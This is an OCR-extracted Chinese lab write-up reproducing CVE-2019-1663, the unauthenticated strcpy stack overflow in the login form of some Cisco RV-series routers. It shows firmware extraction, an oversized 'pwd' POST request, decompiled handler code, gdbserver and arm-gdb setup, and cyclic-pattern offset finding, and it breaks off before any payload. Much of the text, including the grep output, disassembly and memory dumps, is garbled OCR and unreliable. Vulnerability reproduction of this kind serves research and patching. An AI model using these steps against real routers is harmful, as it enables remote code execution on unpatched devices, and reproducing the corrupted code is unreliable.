（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx

(CVE-2019-1663)堆栈缓冲区溢出漏洞一、漏洞简介CVE-2019-1663是一个影响Cisco的多个低端设备的堆栈缓冲区，由于管理界面没 有对登录表单的pwd字段进行严格的过滤，底层在处理请求时，Strcpy函数导致 堆栈溢出，未经身份验证的远程攻击者可以在设备上执行任意代码二、漏洞影响Cisco RVllOW <1.2.1.7 Cisco RV130RV130W < 1.0.3.45 Cisco RV215W <1.3.0.8三、复现过程OxOl固件提取这里我使用时Cisco RV130W 1.0.3.44进行测试的，binwalk对固件进行提取可以看出文件系统是SqUaShfS,并且是小端存储方式,得到一个类Linux目录totnwrcIbtn dm <ky etc foretgn一IAb log Ant proc Sbtn_tr _ 叼 丫“0x02分析处理请求使用grep -r “http”来查找处理http请求的二进制文件t/ Btra， Hle , Rt-> > IH 2, 6t , , 81>, ->a» 8lw? t->a-, H一, tner> IMe , nta-. Ctcr f f, » «1 < f BtCa。 81 , B “一 AIe , Rt - » >， bl”， KU ,八S file ru file HW n nu file me ftle Hie file ru ftu n ftl TUe file m file nu “ n n nuSLdCwtcM sbi*rc tcheSytn/O0mssl 2td wrtbtnrp Rtch* v*lntrtRH Mtcht u«r/«btn/tftM Mtch«» wtrsbntfcH zt<hs usrsblwebroot matches Sfes7gnJf J 5C 33GWH3PS¾ watches KCJs7tk7y Atche usr*btndhcllet tches vt<tnPP Mtchtt u*rttnun> fMtct wittincurl *41cM usrtetnjsorte Fetches usrsbtnl2tM Mtches usr/sbln/cal natch«sU“八IwIIXSso4.1, Mtch«s Msryltb八tbuq.l".d fetches vfrtbUbn*tMp.so.lS Mtch«s w*rllbltbcry*to.*o.t. ZtCh， uftlbUttl.M. 11. *4tce U“八tb八tbZ，M.s。Atcs VSf ltb 4r. tc RAt<MS (ttn) any later versto. See <,：/w(w.fsf.org/copyIeft9pl.tat>.Z2 - «:w>.wes*n85> ”r ”“I 1”J根据之前分析的多个嵌入式设备的经验，猜测这个可能就是处理http请求的底层 文件0x03漏洞分析对Web登录界面的Iogin.cgi发送如下的PC)ST请求POST /login.Cgi HTTP/1.1Host: 10.10.10.2User-Agent: Mozilla/5.0 (Xll; Linux x86_64; rv:60.0) Gecko/20100101 Fir efox/60.0Accept: texthtmljapplicationxhtml+xml,application×mljq=0.9j*jq=0.8Accept-Language: en-US,enjq=0.5Accept-Encoding: gzip, deflateReferer: https:/10.10.10.2/Content-Type: application/x-www-form-urlencodedContent-Length: 137Connection: closeUpgrade-Insecure-Requests: 1submit_button=login&submit_type=&gui_action=&wait_time=0&change_action= &enc=l&user=cisco&pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&Se1_1ang=EN这里向pwd发送32字节的值，对登录界面的http处理请求在IDA中的是 sub.2C614Q,地址是 0x0002C614vl3 atoi(vl2);sprintf(v67j w%d,'j + 1);nvram_set(wdefault_loginM» &byte_899D8);vl4 = sub_lD170(int)MuserM);if ( ! vl4)vl5 =v36 = (char r)vl4;if ( !vl4 )v36 V15；vl6 = sub-lD17e(int)"pwd");IVR7 = (char X)VI6;if ( Ivl6 )vl7 =""if ( !vl6 )v37 = vl7;nptr = (char *)sub-lD170(int)"enc");if ( Inptr )nptr = (char *)&word 89A4C;if ( !post )SUbjLCFB4(35);v25 sub_lD170(int)MuserM);if ( !v25i)v26 = mh;v36 = (char *)v25;if ( Iv25 )v36 v26;v27 = sub-lD170( ( int) ,pwd m );37 = (char *);if ( !v27 )v28 =","if ( !v27 )v37 = v28;nptr = (char )sub_lD170(int)"encM);if ( !nptr )nptr = (char ")&word_89A4C;函数将POST请求的参数进行解析，存储到.bss段 OGeAea7 DC8 0x69 ; ie .bssA9C18 DCB GxbF , Oa .bA8(19 DCB ×6E ; n bss：e(MA8ClADCB* * bsszA8(lBDCB,.bss(XMA81l AEnjl DCB eence,e bss 0A3(20 al_l DCB .广，0e Lbss：eoeA8C22 MB"OCB wuserw,0,I btrS：eoeAM27 KiscowI DCB cisco",ejnPwd DCB pwd,eF831e5dll99e4<_l DCB aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwtO# I bs; (KK巾； aSelLang- D(B "sel-lang",bss OA8CS8aEn-DCB EN,0# i bsseA8(5eDCB# .bs0eA8C5FDCB# LbeeeaAaceeOCBe然后，将PWd参数的值从.bss段中提取，调用StrCPy将值存到动态分配的内存中“xt:MeK2S8text:W«X2M IoCgSt txtcMeX2M KNm, K9CeXt eWX 25( MOV t7CeXtMeX264 text ：MeX264 Ioc 2064text eK2M LM tmx冰 LCM tcvtreeK27 CHP tt M9X274 BNf teMtMejs text Mex27S Ioc. textM×27S tw* MMX77S mu«. I63*1. (U)l<.X7CX27S*11.CODf XSEF: CbeCII_*oc-p4*114tj ;CHCk _enc_pe*M*d*l)SM对于StrCPy我们都很熟悉，它存在的安全问题也十分严峻，并且由于没有开启PlE /ASLR,所以可以随意的进行溢出操作这里使用gdb进行远程调试，确定能够发生溢出的字节数，首先设置CiSCO,作为 gdb调试的服务端，gdbserver配置# wget http: /10.10.10.1:8000/gdbserver 从本机下载到 qemu 模拟的 CiSCO 环 境中# chmod 777 ./gdbserver给权限# ps -W I grep httpd查找httpd开启的进程号2451 05472 S./usr/sbin/httpd2454 01196 Sgrep httpd# ./gdbserver :1234 -attach 2451这里的1234是开启监听的端口号，-attach添加的是httpd的进程号Attached; pid = 2451Listening on port 1234然后成功监听编译 arm-gdb-linuxtar ×vf gdb-7.8.1.tar.gzcd gdb-7.8.1mkdir arm-gdbsudo chmod 777 arm-gdbsudo apt-get install texinfo./configure -target=arm-linu× -prefi×=homeclbltoolsgdb-7.8.1/arm -gdbmake && make install然后在arm-gdb下的bin目录中就有用于调试的arm-linux-gdb,配置调试选项./arm-linux-gdbgef > set architecture arm 确定要调试的是arm架构gef> set follow-fork-mode child 确定调试的进程gef> set solib-search-path homeclbliotfirmware/cisco/_RV130.bin.ext ractedsquashfs-rootlib 加载要用到的 lib 文件gef> file /home/clb/liot/firmware/cisco/_RV130.bin.extracted/squashfs-r oot/usr/sbin/httpd 加载调试文件gef> target remote 10.10.10.2:1234 与远程建立连接已经建立调试连接，可以进行调试了查找溢出的位置，使用pattern生成512个字符串gef> patter create 512+ Generating a pattern of 512 bytesaaaabaaacaaadaaaeaaafaaagaaahaaaiaaaJaaakaaalaaamaaanaaaoaaapaaaqaaaraa asaaataaauaaavaaawaaaxaaayaaazaabbaab